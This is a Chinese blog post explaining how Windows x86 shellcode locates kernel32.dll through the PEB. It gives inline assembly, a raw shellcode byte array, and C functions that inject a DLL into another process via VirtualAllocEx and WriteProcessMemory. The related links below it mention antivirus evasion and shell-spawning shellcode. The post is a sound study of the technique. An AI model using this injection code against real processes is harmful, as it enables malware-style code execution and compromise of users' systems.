获取Kernel32的shellcode

最新推荐文章于 2024-06-03 10:00:45 发布
最新推荐文章于 2024-06-03 10:00:45 发布
阅读量829 收藏 1
点赞数
文章标签: 获取Kernel32的shellcode
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lif1234567890/article/details/58586828
版权

如果你写ShellCode 那么必须从内存中寻找Kernel32的地址,然后才能通过PE结构找到LoadLibrary等函数地址

__declspec(naked) void* FindKernel32()
{
	__asm
	{
		push  edi;
		push  esi;
		push  ecx;
		push  ebx;
		push  00000000h;//向堆栈压入字符串KERNEL32.dll
		push  004C004Ch;
		push  0044002Eh;
		push  00320033h;
		push  004C0045h;
		push  004E0052h;
		push  0045004Bh; //esp-> L"KERNEL32.DLL\0\0";

		xor   ecx, ecx;
		mov   esi, fs:[ecx + 30h];//fs:0 是TEB,+30h是PEB ,
		mov   esi, [esi + 0ch];// PPEB_LDR_DATA Ldr
		mov   esi, [esi + 1ch];// LIST_ENTRY InInitializationOrderModuleList

next_module:
		cmp   esi, 0; //判断next 是否存在
		je    no_next;

		mov   ecx, esp;
		mov   eax, [esi + 8h];//eax 是地址
		mov   edi, [esi + 20h]; //edi 指向内存中的模块地址 现在需要和ecx处比较
		mov   esi, [esi];//esi 指向下一个

remach:
		mov   ebx, [ecx];
		cmp   word ptr[edi], bx;//逐个字符比较(若觉得存在大小写问题 可以做不区分大小写的比较,这里没写)
		jne   next_module;

		add   ecx, 2; //下一个字符(Unicode字符用2个字节)
		add   edi, 2;

		mov   ebx, [ecx];
		cmp   bx, 0;
		je    match_OK;
		jmp   remach;

no_next:
		mov   eax, 0;

match_OK:
		add   esp, 28;
		pop   ebx;
		pop   ecx;
		pop   esi;
		pop   edi;
		ret;
	};
}


于是 通过shellcode进行dll注入的关键代码如下,此方法可以避免因为kernel32的加载地址不是默认的导致注入失败 

static const unsigned char template_shell_loadlibrary[] =
{
	0xE8, 0x0D, 0x02, 0x00, 0x00,
	0xE9, 0xBB, 0x02, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x57, 0x56, 0x51, 0x53, 0x6A, 0x00, 0x68, 0x4C, 0x00, 0x4C, 0x00, 0x68, 0x2E, 0x00, 0x44, 0x00, 0x68, 0x33, 0x00, 0x32, 0x00,
	0x68, 0x45, 0x00, 0x4C, 0x00, 0x68, 0x52, 0x00, 0x4E, 0x00, 0x68, 0x4B, 0x00, 0x45, 0x00, 0x33, 0xC9, 0x64, 0x8B, 0x71, 0x30,
	0x8B, 0x76, 0x0C, 0x8B, 0x76, 0x1C, 0x83, 0xFE, 0x00, 0x74, 0x2A, 0x8B, 0xCC, 0x8B, 0x46, 0x08, 0x8B, 0x7E, 0x20, 0x8B, 0x36,
	0x8B, 0x19, 0x53, 0x8B, 0x1F, 0x53, 0xE8, 0x22, 0x00, 0x00, 0x00, 0x83, 0xFB, 0x00, 0x75, 0xE1, 0x83, 0xC1, 0x02, 0x83, 0xC7,
	0x02, 0x8B, 0x19, 0x66, 0x83, 0xFB, 0x00, 0x74, 0x07, 0xEB, 0xE0, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x83, 0xC4, 0x1C, 0x5B, 0x59,
	0x5E, 0x5F, 0xC3, 0x66, 0x83, 0x7C, 0x24, 0x04, 0x61, 0x7C, 0x0E, 0x66, 0x83, 0x7C, 0x24, 0x04, 0x7A, 0x7F, 0x06, 0x66, 0x83,
	0x6C, 0x24, 0x04, 0x20, 0x66, 0x83, 0x7C, 0x24, 0x08, 0x61, 0x7C, 0x0E, 0x66, 0x83, 0x7C, 0x24, 0x08, 0x7A, 0x7F, 0x06, 0x66,
	0x83, 0x6C, 0x24, 0x08, 0x20, 0x8B, 0x5C, 0x24, 0x04, 0x66, 0x3B, 0x5C, 0x24, 0x08, 0x75, 0x08, 0xBB, 0x00, 0x00, 0x00, 0x00,
	0xC2, 0x08, 0x00, 0xBB, 0x01, 0x00, 0x00, 0x00, 0xC2, 0x08, 0x00,
	0x05, 0x78, 0x56, 0x34, 0x12, //add eax,12345678h
	0x68, 0x89, 0x67, 0x45, 0x23, //push 23456789h
	0xFF, 0xD0, //call eax
	0xC2, 0x04, 0x00,//ret4
};


LPVOID VirtualAlloc_LoadLibraryShellCode(HANDLE hProcess)
{
	return ::VirtualAllocEx(hProcess, 0, sizeof(template_shell_loadlibrary), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
}

BOOL WriteProcessMemory_LoadLibraryShellCode(HANDLE hProcess, LPVOID lpAddr, LPCWSTR lpDllPath, DWORD LoadlibraryOffsetOffKernel32, SIZE_T* OUT szWrite)
{
	BOOL br = FALSE;

	if(lpDllPath && szWrite)
	{
		unsigned char shellcode[sizeof(template_shell_loadlibrary)] = {};
		memcpy(shellcode, template_shell_loadlibrary, sizeof(template_shell_loadlibrary));
		StringCchCopyW((WCHAR*)(shellcode + 10), 260, lpDllPath);
		DWORD* pOffSet = (DWORD*)(shellcode + sizeof(shellcode) - 14);
		DWORD* pPathAddr = (DWORD*)(shellcode + sizeof(shellcode) - 9);
		*pPathAddr = (DWORD)(lpAddr)+ 10;
		*pOffSet = LoadlibraryOffsetOffKernel32;
		br =::WriteProcessMemory(hProcess, lpAddr, shellcode, sizeof(shellcode), szWrite);
	}

	return br;
}



nLif
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shellcode定位kernel32与LoadLibrary
Mr.Out的专栏
02-05 3232
<br />//定位Kernel32 __declspec(naked) int GetKernel32Base() { __asm { XOR ECX, ECX ; ECX = 0 MOV ESI, FS:[ECX + 0x30] ; ESI = &(PEB) ([FS:0x30]) MOV ESI, [ESI + 0x0C] ; ESI = PEB->Ldr MOV
【免杀】通用shellcode原理及思路——FS段寄存器获取kernel32.dll基址逻辑、根据函数名进行查找逻辑、双指针循环遍历获取函数名称
m0_62783065的博客
01-08 581
【免杀】通用shellcode原理——FS段寄存器获取kernel32.dll基址逻辑、根据函数名进行查找逻辑、双指针循环遍历获取函数名称
探索内核世界的钥匙:Kernel Shellcode Loader
最新发布
gitblog_00088的博客
06-03 218
探索内核世界的钥匙:Kernel Shellcode Loader 项目地址:https://gitcode.com/mandiant/flare-kscldr 在安全研究和操作系统深度定制的领域里,有一个工具正等待着那些敢于深入内核深处的探险者——那就是Kernel Shellcode Loader。这个由FLARE团队打造的神器,为开发者和研究人员提供了一种高效、灵活的方式去加载和执行内核级别...
ES6 $ ES5
wanglei的博客
07-12 199
参考地址: https://www.runoob.com/w3cnote/es6-tutorial.html菜鸟教程 https://es6.ruanyifeng.com/阮一峰 https://www.mithriljs.net/es6.html中文教程 es6合并数组的写法: 1. var (Es5) 会存在变量提升, 可以在未申明的时候直接使用,返回undefined l...
汇编fs 寄存器
热门推荐
tangyanzhi1111的专栏
05-15 1万+
tangyanzhi11110我的:收件箱资源博客空间设置|帮助|退出 首页业界移动云计算研发论坛博客下载 更多 彼月的专栏 目录视图摘要视图订阅 有奖征集活动系列——【HTML5游戏编程之旅】        专访雷果国:我从1.5K到18K的成长之路      【限时优惠】第五届云计算大会社区门票抢购  探究云计
Windows x86 Shellcode开发:寻找Kernel32.dll地址
systemino的博客
04-24 775
前言 针对一个已经学习了Linux Shellcode开发,并开始在Windows上尝试的研究人员来说,这一过程可能要比想象的更加艰难。Windows内核与Linux完全不同。尽管如此,但Linux内核要比Windows更容易理解,原因在于其开源的特性,并且与Windows相比,Linux只具有相当少的功能。另一方面,Windows在过去几年中进行了重大的改进,由于这一改进,新版本与老版本相比已...
Win 7下定位kernel32.dll基址及shellcode编写1
08-03
在Windows操作系统中,尤其是Windows 7环境下,动态定位kernel32.dll的基地址对于编写兼容性强的shellcode或恶意软件至关重要。kernel32.dll是Windows系统的核心动态链接库,提供了许多与用户界面、进程和线程管理、...
shellCode
04-06
一段获取kernel内函数的净荷
电子科技大学软件安全搜索API实验
01-05
在ollydbg中,学生可以通过单步执行代码,观察寄存器的变化,以确认kernel32.dll、LoadLibrary()和GetProcAddress()的地址是否获取成功。 通过这个实验,学生不仅能够掌握API搜索的技术,还能提升对Windows系统内存...
通用ShellCode深入剖析
06-04
- **GetKernel32函数**:通过内联汇编,可以编写一个函数,利用TEB来获取Kernel32.DLL的基址。这个基址对于调用Kernel32.DLL中的函数(如LoadLibraryA和GetProcAddress)是必要的。 3. **综合运用:简单的通用...
编写小型shellcode(writing small shellcode
08-16
3. **获取API地址**:由于Shellcode不能依赖动态链接库,它需要找到系统函数的地址,如`kernel32.dll`中的`CreateProcessA`。 4. **构造参数**:为系统调用准备参数,可能涉及栈上的数据布局。 5. **调用API**:执行...
详解缓冲区溢出-ShellCode提取等
08-22
这算是比较详细的讲解缓冲区溢出攻防等利用手段 从入门到精通 我相信看完后 哪怕对缓冲区溢出闻所未闻的人 也能成为一个高手 个中意识及生动的讲解方式 课后练习等~~ 相对这方面的知识网上还很少 而且入门级的就更少了 这里忍疼风险出来 需要的账户和密码已经打包在压缩文件中
关于kernel32基地址获取
xrain_zh的专栏
03-27 4990
[-] 关于kernel32基地址获取shellcode获取kernel32dll基地址二获取当前进程的PID 文件名 以及完整路径 关于kernel32基地址获取 http://joychou.sinaapp.com/index.php/Reverse/teb.html 一、shellcode获取kernel32.dll基地址) 首先了解TEB,
shellcode获得kernel32基址的方法,win7,XP通用哦
weixin_33804990的博客
01-16 133
mov eax, fs:[30h] mov eax, [eax+0ch] mov eax, [eax+0ch] mov eax, [eax] mov eax, [eax] mov edi, [eax+18h] 基址储存于edi中 转载于:htt...
编写Windows Kernel Shellcode
Sven的忘却日记
07-14 1105
网上流传的永恒之蓝漏洞利用代码中,关于内核shellcode部分,大部分都是利用APC注入的。 最近有个想法,直接利用内核代码执行权限,来写文件,于是就抄起了VS,开始写shellcode,开始以为和R3下面写shellcode一样简单… 新建个驱动的项目,按照下面修改项目的属性,然后动态获取API,再调API完成自己的功能。 // C/C++ // |-常规 // | |-调试信息格式:程序数...
WIN下获取kernel基址的shellcode探讨(ZZ)
weixin_34292402的博客
06-29 427
转自:http://hi.baidu.com/gz1x/blog/item/c3c8f8f8b028040cd9f9fd90.html2007-10-10 15:21 <pre><font size="2">gz1X [gz1x(at)tom(dot)com]<br /><br />2005.6.30</font><font si...
查看完整版本: 使用C语言编写提取通用shellcode的程序
yingfox的专栏
11-13 953
导读:   使用C语言编写提取通用shellcode的程序文章修改:Hume/冷雨飘心   文章注释:我非我[F.S.T]   信息来源:黑客基地   [code]/*   说明:此程序可以用标准c语言string格式打印出你所在ShellCodes函数中编写的shellcode   用vc编译时请使用Release格式并取消优化设置,否则不能正常运行   */   #include  
Win 7下定位kernel32.dll基址及shellcode编写
Puzzle的专栏
05-15 1120
链 接: http://bbs.pediy.com/showthread.php?t=122260   Win 7下定位kernel32.dll基址及shellcode编写 Author:Cryin Data:2010.10.14 Blog:http://hi.baidu.com/justear       为了使shellcode在多种操作系统平台下都可以正常
"编写32位ARM平台shellcode,成功getshell获取flag
这个汇编语句是一个27字节的Shellcode,用于在ARM 32位平台上执行execve("/bin/sh", [0], [0 vars])操作。需要注意的是,在init.cfg文件中可以看到,Shell的路径为/bin/shell,而网站上的Shellcode是运行/bin/sh,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值